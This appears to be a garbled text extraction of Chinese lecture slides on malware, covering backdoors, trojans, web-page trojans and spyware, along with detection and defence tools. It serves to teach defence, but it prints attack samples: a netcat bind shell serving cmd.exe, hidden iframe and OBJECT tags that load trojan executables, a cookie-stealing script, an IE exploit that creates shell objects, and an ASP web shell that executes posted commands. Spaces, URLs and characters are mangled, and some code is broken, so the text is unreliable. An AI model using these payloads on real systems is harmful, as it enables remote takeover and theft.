惡意軟件（病毒）的分析與防范

Defence&analysisofmalware

Fujms@網(wǎng)絡(luò)安全后門教程

后門后門是一個(gè)允許攻擊者繞過系統(tǒng)中常規(guī)安全控制機(jī)制的程序，他按照攻擊者自己的意圖提供通道。后門的重點(diǎn)在于為攻擊者提供進(jìn)入目標(biāo)計(jì)算機(jī)的通道。網(wǎng)絡(luò)安全后門教程后門的類型本地權(quán)限的提升對系統(tǒng)有訪問權(quán)的攻擊者變換其權(quán)限等級成為管理員，然后攻擊者可以重新設(shè)置該系統(tǒng)或訪問人和存儲在系統(tǒng)中的文件。單個(gè)命令的遠(yuǎn)程執(zhí)行攻擊者可以向目標(biāo)計(jì)算機(jī)發(fā)送消息。每次執(zhí)行一個(gè)單獨(dú)的命令，后門執(zhí)行攻擊者的命令并將輸出返回給攻擊者。遠(yuǎn)程命令行解釋器訪問正如遠(yuǎn)程Shell，這類后門允許攻擊者通過網(wǎng)絡(luò)快速直接地鍵入受害計(jì)算機(jī)的命令提示。其比“單個(gè)命令的遠(yuǎn)程執(zhí)行”要強(qiáng)大得多。遠(yuǎn)程控制GUI攻擊者可以看到目標(biāo)計(jì)算機(jī)的GUI，控制鼠標(biāo)的移動(dòng)，輸入對鍵盤的操作，這些都通過網(wǎng)絡(luò)實(shí)現(xiàn)。網(wǎng)絡(luò)安全后門教程后門的安裝自己植入（物理接觸或入侵之后）通過病毒、蠕蟲和惡意移動(dòng)代碼欺騙受害者自己安裝Email遠(yuǎn)程共享BT下載……網(wǎng)絡(luò)安全后門教程后門舉例NetCat：通用的網(wǎng)絡(luò)連接工具用法一：

nc–l–p5000–ecmd.exenc5000用法二：nc–l–p5000nc5000–ecmd.execshell.exe網(wǎng)絡(luò)安全后門教程其他Windows下的后門程序CryptCatTini提供通向Tcp端口7777，只有3K。……網(wǎng)絡(luò)安全后門教程網(wǎng)絡(luò)安全后門教程無端口后門-如何喚醒ICMP后門不使用TCP/UDP協(xié)議。使用ICMP協(xié)議進(jìn)行通信。難以檢測。非混合型探測后門攻擊者將觸發(fā)指令發(fā)送到對方計(jì)算機(jī)。難以檢測。(Cd00r:syntoportx,syntoporty,syntoportz)混合型探測后門只要攻擊者將觸發(fā)指令發(fā)送到對方網(wǎng)絡(luò)中即可觸發(fā)后門。更加難以檢測。(syntoportx,syntoportx,syntoportxindifferentIps)網(wǎng)絡(luò)安全后門教程Bits--glacier進(jìn)程管理器中看不到平時(shí)沒有端口，只是在系統(tǒng)中充當(dāng)臥底的角色提供正向連接和反向連接兩種功能僅適用于Windows2000/XP/2003具體用法和例子可以查看“難以覺察的后門--BITS”一文網(wǎng)絡(luò)安全后門教程GUI(GraphicsUserInterface)遠(yuǎn)程控制并非所有的GUI遠(yuǎn)程控制都是惡意的VNC(VirtualNetworkComputing)WindowsTerminalServicesPCAnywhereBackOrifice2000SubSeven網(wǎng)絡(luò)安全后門教程VNC英國劍橋大學(xué)AT&T實(shí)驗(yàn)室在2002年開發(fā)的輕量型的遠(yuǎn)程控制計(jì)算機(jī)軟件，任何人都可免費(fèi)取得該軟件。VNC軟件主要由兩個(gè)部分組成：VNCserver及VNCviewer。VNCserver與VNCviewer支持多種操作系統(tǒng)，如windows，Linux，MacOS及Unix系列（Unix，Solaris等），因此可將VNCserver及VNCviewer分別安裝在不同的操作系統(tǒng)中進(jìn)行控制。也可以通過一般的網(wǎng)絡(luò)瀏覽器（如IE等）來控制被控端（需要Java虛擬機(jī)的支持）。網(wǎng)絡(luò)安全后門教程VNC程序舉例網(wǎng)絡(luò)安全后門教程后門的啟動(dòng)感染普通執(zhí)行文件或系統(tǒng)文件添加程序到“開始”-“程序”-“啟動(dòng)”選項(xiàng)

修改系統(tǒng)配置文件win.ini、system.ini、wininit.ini、winstart.bat、autoexec.bat等的相關(guān)啟動(dòng)選項(xiàng)

通過修改注冊表啟動(dòng)鍵值

修改文件關(guān)聯(lián)的打開方式

添加計(jì)劃任務(wù)

利用自定義文件夾風(fēng)格

注冊為Internet

Explorer的

BHO

(Browser

Helper

Object)組件

具體請參考“Windows的自啟動(dòng)方式”一文。網(wǎng)絡(luò)安全后門教程檢測Windows后門啟動(dòng)技術(shù)手工檢測注冊表啟動(dòng)鍵值啟動(dòng)選項(xiàng)關(guān)聯(lián)方式計(jì)劃任務(wù)…利用工具檢測MsconfigAutoRuns完整性檢測程序（GFILANguardSystemIntegrityMonitor,IonxDataSentinel）網(wǎng)絡(luò)安全后門教程AutoRuns的運(yùn)行界面網(wǎng)絡(luò)安全后門教程如何防御后門

--普通后門培養(yǎng)良好的安全意識和習(xí)慣。使用網(wǎng)絡(luò)防火墻封鎖與端口的連接。僅允許最少數(shù)量的端口通信通過防火墻天網(wǎng)個(gè)人防火墻，瑞星防火墻，江民黑客防火墻，ZoneAlarm，NortonPersonalFirewall……經(jīng)常利用端口掃描器掃描主機(jī)或端口查看工具查找本地端口監(jiān)聽程序。Nmap，Xscan，NC，F(xiàn)port，TcpView，IceSword……網(wǎng)絡(luò)安全后門教程如何防御后門

--無端口后門查找不尋常的程序查找不尋常的進(jìn)程利用基于網(wǎng)絡(luò)的IDS查找隱蔽的后門命令，如Snort。檢測本地和網(wǎng)絡(luò)中的混雜模式的網(wǎng)卡本地檢測嗅探器（Promiscdetect.exe）遠(yuǎn)程檢測嗅探器（Sentinel,AntiSniff）網(wǎng)絡(luò)安全后門教程2.特洛伊木馬特洛伊木馬是一個(gè)程序，他看起來具有某個(gè)有用的或善意的目的，但是實(shí)際上掩蓋著一些隱藏的惡意功能。欺騙用戶或者系統(tǒng)管理員安裝在計(jì)算機(jī)上與“正?！钡某绦蛞黄鸹旌线\(yùn)行，將自己偽裝得看起來屬于該系統(tǒng)。網(wǎng)絡(luò)安全后門教程后門VS特洛伊木馬如果一個(gè)程序僅僅提供遠(yuǎn)程訪問，那么它只是一個(gè)后門。如果攻擊者將這些后門功能偽裝成某些其他良性程序，那么就涉及到真正的特洛伊木馬。網(wǎng)絡(luò)安全后門教程特洛伊木馬木馬系統(tǒng)軟件一般由木馬配置程序、控制端程序和木馬程序(服務(wù)器程序)等三部分組成。木馬程序，也稱服務(wù)器程序，它駐留在受害者的系統(tǒng)中，非法獲取其操作權(quán)限，負(fù)責(zé)接收控制端指令，并根據(jù)指令或配置發(fā)送數(shù)據(jù)給控制端。木馬配置程序設(shè)置木馬程序的端口號、觸發(fā)條件、木馬名稱等，使其在服務(wù)端藏得更隱蔽，有時(shí)該配置功能被集成在控制端程序菜單內(nèi)，不單獨(dú)作為一個(gè)程序?？刂贫顺绦蚩刂七h(yuǎn)程服務(wù)器，有些程序集成了木馬配置的功能。網(wǎng)絡(luò)安全后門教程網(wǎng)絡(luò)安全后門教程2.1名字欺騙修改文件的文件名以欺騙用戶與Windows擴(kuò)展名放在一起B(yǎng)eauty.jpg.exe模仿其他文件名httpd,iexplore,notepad,ups,svchost…不能用“任務(wù)管理器”刪除的進(jìn)程名Csrss.exe,services.exe,smss.exe,winlogon.exe,system,systemidleprocess路徑威脅如將木馬命名為explorer.exe放在C:\下。網(wǎng)絡(luò)安全后門教程對命名陷阱的防御確定指定進(jìn)程屬于哪個(gè)程序Fport,icesword,tcpview…使用殺進(jìn)程工具進(jìn)行查殺Pskill,icesword…網(wǎng)絡(luò)安全后門教程2.2文件捆綁惡意程序與正常程序捆綁捆綁工具EXE捆綁機(jī),Wrappers,binders,EXEbinders……CHM,Flash….壓縮軟件（winrar）WinRMSetup30.exe防御使用反病毒軟件進(jìn)行檢測，并及時(shí)更新病毒庫。網(wǎng)絡(luò)安全后門教程2.3軟件下載從網(wǎng)上下載的軟件是你真正需要的軟件嗎？從網(wǎng)上下載的軟件是否被惡意修改過？防御措施用戶注意完整性檢測（如MD5,）小心測試新軟件網(wǎng)絡(luò)安全后門教程2.4軟件本身帶毒內(nèi)部員工注入惡意代碼軟件開發(fā)的全球化趨勢多個(gè)部門聯(lián)合開發(fā)軟件，一層層的外包網(wǎng)絡(luò)安全后門教程2.5Html傳播網(wǎng)頁病毒的傳播方式Flash傳播網(wǎng)頁email傳播網(wǎng)頁Chm傳播網(wǎng)頁木馬Exe2bmp正常網(wǎng)頁中攜帶網(wǎng)絡(luò)安全后門教程網(wǎng)頁病毒的傳播方式

1-美麗的網(wǎng)頁名稱，以及利用瀏覽者的無知.

URL1:

URL2:

網(wǎng)絡(luò)安全后門教程plmm001.gif<html><BODY><iframesrc=""width=0height=0frameborder=0></IFRAME><center><imgsrc=""></CENTER></BODY></HTML>網(wǎng)絡(luò)安全后門教程Flash傳播網(wǎng)頁用FlashMX制作：第一幀，打開動(dòng)作面板，進(jìn)入Actions\Brower\NetWork\GetUrlhttp://網(wǎng)頁木馬地址，windows:_self第二幀，Actions\Brower\NetWork\loadmoviehttp://…*.swf網(wǎng)絡(luò)安全后門教程email傳播網(wǎng)頁1.<scriptlanguage=javascript>Window.open(“‘+document.cookie”)</script>2.<bodyonload=“windows.location=‘’;”></body>網(wǎng)絡(luò)安全后門教程email傳播網(wǎng)頁3.<framesetcols=“100%,*”><framesrc=“”scrolling=“auto”></frameset>4.<metahttp-equiv=“refresh”content=“0;URL=”>5<iframesrc=""width=0height=0frameborder=0></IFRAME>網(wǎng)絡(luò)安全后門教程email傳播網(wǎng)頁<objectdata=“htpp://xxxxx/x.ASP"width=0height=0>網(wǎng)絡(luò)安全后門教程Chm傳播網(wǎng)頁木馬x.htm：<OBJECTNAME='X'CLASSID='CLSID:11111111-1111-1111-1111-111111111123'wight=0height=0CODEBASE='x.exe'>or<OBJECTWidth=0Height=0style="display:none;"TYPE="application/x-oleobject"CODEBASE="x.exe">EasyCHMorQuickchm把x.htm和x.exe生成x.chm網(wǎng)絡(luò)安全后門教程exe2bmpexe2bmp可以將一個(gè).exe可執(zhí)行文件生成同名的.bmp、.asp、.htm三個(gè)文件。將這三個(gè)文件放到支持ASP的空間里邊，當(dāng)別人打開.htm網(wǎng)頁文件的時(shí)候，先前的.exe木馬將被自動(dòng)下載到對方的硬盤并運(yùn)行。Forexamplex.exeproduce:x.bmp;x.asp;x.htm網(wǎng)絡(luò)安全后門教程x.htm<html><head></head><body>數(shù)據(jù)裝載中，可能需要10秒至30秒............<IMGSRC=x.bmpwidth=0height=0><objectdata="x.ASP"width=0height=0></object></body></html>網(wǎng)絡(luò)安全后門教程x.asp1-在cache中尋找1.bmp2-把bmp還原為exe3-執(zhí)行exe網(wǎng)絡(luò)安全后門教程正常網(wǎng)頁中攜帶<iframesrc=""width=0height=0frameborder=0></IFRAME>Window.openOnload,onerror<metahttp-equiv=“refresh”content=“0;URL=”><objectdata=“htpp://xxxxx/x.ASP"width=0height=0><OBJECTWidth=0Height=0style="display:none;"TYPE="application/x-oleobject"CODEBASE="x.exe">網(wǎng)絡(luò)安全后門教程網(wǎng)頁病毒、網(wǎng)頁木馬的原理

Javascript.Exception.Exploit：JS+WSH

錯(cuò)誤的MIMEMultipurposeInternetMailExtentions，多用途的網(wǎng)際郵件擴(kuò)充協(xié)議頭.

IE5.0到IE6.0

EXEto.BMP+Javascritp.Exception.Exploit

iframe

漏洞的利用：父窗口能在子域環(huán)境下運(yùn)行腳本代碼，包括任意的惡意代碼

通過安全認(rèn)證的CAB,COX

EXE文件的捆綁

網(wǎng)絡(luò)安全后門教程Javascript.Exception.Exploit

Functiondestroy(){try{a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl=a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");a1.createInstance();FSO=a1.GetObject();a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Net=a1.GetObject();try{dosomething;}}catch(e){}}catch(e){}}functiondo(){setTimeout("destroy()",1000);//設(shè)定運(yùn)行時(shí)間1秒}do()//壞事執(zhí)行函數(shù)指令網(wǎng)絡(luò)安全后門教程錯(cuò)誤的MIMEMultipurposeInternetMailExtentions

Content-Type:multipart/related;

type="multipart/alternative“;

boundary=”====B====“

--====B====

Content-Type:multipart/alternative;

boundary=”====A====“

--====A====

Content-Type:text/html;

Content-Transfer-Encoding:quoted-printable

--====A====--

--====B====

Content-Type:audio/x-wav;

name=”run.exe“---可以改為其他腳本文件

Content-Transfer-Encoding:base64

Content-ID:

---以下省略AAAAAN+1個(gè)---

當(dāng)申明郵件

的類型為audio/x-wav時(shí)，IE存在的一個(gè)漏洞會將附件認(rèn)為是音頻文件自動(dòng)嘗試打開

網(wǎng)絡(luò)安全后門教程iframe

〈iframesrc=run.emlwidth=0height=0〉〈/iframe〉

網(wǎng)絡(luò)安全后門教程Startup.html<html><body><ahref="shell:startup"id="clientcall">startup</a><scriptlanguage="JavaScript"type="text/javascript"> document.getElementById("clientcall").click()</script></body></html>網(wǎng)絡(luò)安全后門教程HTA的全名為HTMLApplication

<HTA:APPLICATION

windowState="minimize"showInTaskBar="no"border="none"caption="no">

參見x.asp網(wǎng)絡(luò)安全后門教程各種溢出型漏洞iframe溢出

Javaprxy.DLLCOM對象堆溢出漏洞

網(wǎng)絡(luò)安全后門教程木馬的發(fā)展加入Rootkit,隱藏文件/端口/服務(wù)/進(jìn)程等HTTP隧道HyDan(把信息隱藏在二進(jìn)制文件中)……網(wǎng)絡(luò)安全后門教程<%OnErrorResumeNext%><%SetoScript=Server.CreateObject("WSCRIPT.SHELL")%><%Seto=Server.CreateObject("Scripting.")%><%cmd=Request.Form(".CMD")%><%If(cmd<>"")Then%><%szTempFile="C:\\"&o()%><%CalloScript.Run("cmd.exe/c"&cmd&">"&szTempFile,0,True)%><%SetoFile=o(szTempFile,1,False,0)%><%EndIf%><FORMaction="<%=Request.ServerVariables("URL")%>"method="POST"><inputtype=textname=".CMD"size=45value="<%=cmd%>"><inputtype=submitvalue="Execute"class=input></FORM><PRE><%If(IsObject(oFile))Then%><%OnErrorResumeNext%><%Response.WriteServer.HTMLEncode(o)%><%o><%Callo(szTempFile,True)%><%EndIf%></PRE>網(wǎng)絡(luò)安全后門教程木馬檢測工具安天實(shí)驗(yàn)室：木馬防線功能介紹網(wǎng)絡(luò)安全后門教程木馬防線2005+網(wǎng)絡(luò)安全后門教程木馬克星木馬克星可以查殺8122種國際木馬,1053種密碼偷竊木馬,保證查殺傳奇密碼偷竊木馬,灰鴿子API反殺病毒軟件類木馬,冰河類文件關(guān)聯(lián)木馬,密碼解霸,奇跡射手等游戲密碼郵寄木馬,內(nèi)置木馬防火墻,任何黑客程序試圖發(fā)送密碼郵件,都需要Iparmor確認(rèn),不僅可以查殺木馬,更可以反查黑客密碼。網(wǎng)絡(luò)安全后門教程間諜軟件他們以主動(dòng)收集用戶個(gè)人信息、相關(guān)機(jī)密文件或隱私數(shù)據(jù)為主，搜集到的數(shù)據(jù)會主動(dòng)傳送到指定服務(wù)器。網(wǎng)絡(luò)安全后門教程間諜軟件發(fā)展之初，多被一些在線廣告商以及Kazaa等音樂交換網(wǎng)站使用，這些公司將一些監(jiān)控程序放在用戶電腦內(nèi)監(jiān)視其網(wǎng)上行為、收集其興趣愛好，或者在空閑時(shí)間進(jìn)行其它操作。這些公司以讓用戶上網(wǎng)免費(fèi)賺錢或免費(fèi)獲得音樂為幌子，吸引了眾多用戶下載，而這些軟件中所帶的間諜程序便悄悄地收集用戶信息，然后根據(jù)這些信息發(fā)送廣告，或者把這些收集的信息轉(zhuǎn)賣給其他廣告公司獲取利益。網(wǎng)絡(luò)安全后門教程間諜軟件的傳播方式軟件捆綁和嵌套瀏覽網(wǎng)站（惡意網(wǎng)頁或網(wǎng)頁木馬）郵件發(fā)送利用漏洞進(jìn)行主動(dòng)傳播和植入（多隱身于蠕蟲之中）。網(wǎng)絡(luò)安全后門教程部分間諜和廣告軟件CoolWebSearch：可能是最下流也最惡毒的程序之一。它完全劫持了IE瀏覽器，害你什么事都做不成。PurityScan，一個(gè)顯示彈出廣告，聲稱可以發(fā)現(xiàn)并刪除個(gè)人電腦上的色情內(nèi)容的程序。Transponder(vx2)，一個(gè)IE“瀏覽器助手”，它能夠監(jiān)控網(wǎng)絡(luò)瀏覽并發(fā)送相關(guān)廣告。KeenValue是一個(gè)廣告程序，它收集個(gè)人信息并向計(jì)算機(jī)用戶發(fā)送廣告。PerfectKeylogger一個(gè)記錄所訪問過的站點(diǎn)、擊鍵的記錄和鼠標(biāo)的移動(dòng)的工具。它記錄下用戶的口令和賬戶等信息。網(wǎng)絡(luò)安全后門教程ContinueHotBar(BHO)AbetterInternet網(wǎng)絡(luò)安全后門教程發(fā)展趨勢逐漸融合了各種病毒、蠕蟲、木馬、甚至Rootkit的技術(shù)和特點(diǎn)，無處不在，危害特別巨大。其會變得越來越普遍，越來越復(fù)雜。功能越來越就有針對性和目的性。自我隱藏技術(shù)則會越來越先進(jìn)。這將給間諜軟件的檢測帶來巨大挑戰(zhàn)。網(wǎng)絡(luò)安全后門教程間諜軟件檢測工具1.SpybotSearchandDestroy(簡稱：SpyBotS&D)：能掃描你的硬盤，然后找出你硬盤里面的廣告和間諜程序，然后把這些會對你的電腦產(chǎn)生危害的程序移除，支持常用的所有瀏覽器。2.SpySweeper：讓你免受間諜軟件的影響，它能在你瀏覽網(wǎng)頁，瀏覽郵件，下載軟件的時(shí)候給予你充足的保護(hù)，免受間諜軟件的入侵，保護(hù)個(gè)人的信息。網(wǎng)絡(luò)安全后門教程間諜軟件檢測工具3.SpywareDoctor：是一個(gè)先進(jìn)的間諜軟件、廣告軟件公用程序，它可以檢查并從你的電腦移走間諜軟件、廣告軟件、木馬程序、鍵盤記錄器和追蹤威脅。4.SpyRemover：專門為清除悄悄安裝在你的電腦里的間諜程序而設(shè)計(jì)的一個(gè)計(jì)算機(jī)網(wǎng)絡(luò)安全工具。它可以幫助你快速的在系統(tǒng)組件中搜索已知的間諜程序的蹤跡，并可以幫助你安全的清除他們。全面保護(hù)你的網(wǎng)絡(luò)安全。支持多國語言。

網(wǎng)絡(luò)安全后門教程間諜軟件檢測工具5.微軟：AntiSpyware。6.McAfee企業(yè)版反間諜軟件。其可有效偵測及降低遭受間諜程序(spyware)、廣告軟件(adware)、色情撥號程序(dialers)、鍵盤記錄軟件(keyloggers)、cookies文件和遠(yuǎn)程控制程序等潛在惡意程序(PUPs)的襲擊。網(wǎng)絡(luò)安全后門教程Question？網(wǎng)絡(luò)安全后門教程HideinformationinafileBlindside(Freeware)-UsesBMPcarrierfilesandincludesencryption.BMPSecrets(Freeware)-UsesBMPcarrierfilesandincludesencryption.Cameleon(Freeware)-FrenchlanguagetoolthatusesGIFcarrierfilesandincludesencryption.Camera/Shyv(Freeware)-ScansforanddeliversdecryptedcontentfromtheInternet.Camouflage(Freeware)-Canhideinformationinanydigitalbyinsertingitaftertheendof.Informationhiddenthiswaywillnotaffecthowthecarrierlooksorbehaves,althoughitwillincrease.Includespasswordprotection.ContrabandHellEdition(Freeware)-UsesBMPcarrierfilesandincludesencryption.Courierv1.0a(Freeware)-UsesBMPcarrierfiles.CryptArkan(Shareware)-UsesWAVandBMPcarrierfiles;hiddendatacanbedirectlyreadoffanaudioCD.Includesencryption.DataPrivacyTools(Freeware)UsesBMPcarrierfilesandincludesencryption.

網(wǎng)絡(luò)安全后門教程HideinformationinafileDataStash(Shareware)-UsesBMPanddatabasecarrierfilesandincludespasswordprotection.DigitalPictureEnvelopev1.0(Freeware)-UsesBMPcarrierfiles.EncryptPic(Shareware)-Uses24-bitBMPcarrierfilesandincludesencryption.Gif-it-Up(Freeware)-UsesGIFcarrierfilesandincludesencryption.Gifshufflev2.0(Freeware)-Acommand-linetoolthatusesGIFcarrierfilesandincludesencryption.HermeticStego(Shareware)-UsesBMPcarrierfiles.Thedevelopersclaimtheirstegokeymakesthepayloadundetectable.HideandSeekforWin95(Shareware)-UsesBMPcarrierfilesandincludesencryptionand.Hide4PGPv2.0(Freeware)-Acommand-linetoolthatusesBMP,WAV,andVOCcarrierfiles.HideInPicture2.0(Freeware)-USesBMPcarrierfilesandincludesencryption.ImageHide(Freeware)-Usesavarietyofimagecarrierfiles.InPlainView(Freeware)-UsesBMPcarrierfilesandincludespasswordprotection.InThePicture(Shareware)-UsesBMPcarrierfilesandincludesencryption.網(wǎng)絡(luò)安全后門教程InfoStego(Freeware)-UsesBMPcarrierfiles;includesencryption.InvisibleSecretsv4.0(Shareware)-UsesJPEG,PNG,BMP,HTMLandWAVcarrierfiles.Includesencryption,shredder,passwordmanagerandself-decryptingarchives.JPegX(Freeware)-UsesJPEGcarrierfilesandincludesencryptionandpasswordprotection.JPHideandSeek(Freeware)-UsesJPEGcarrierfilesandincludesencryption.JStegShellv2.0(Freeware)-UsesJPEGcarrierfiles;includesencryption.MP3Stego(Freeware)-UsesMP3carrierfiles.PGPn123(Freeware)-Atoolthat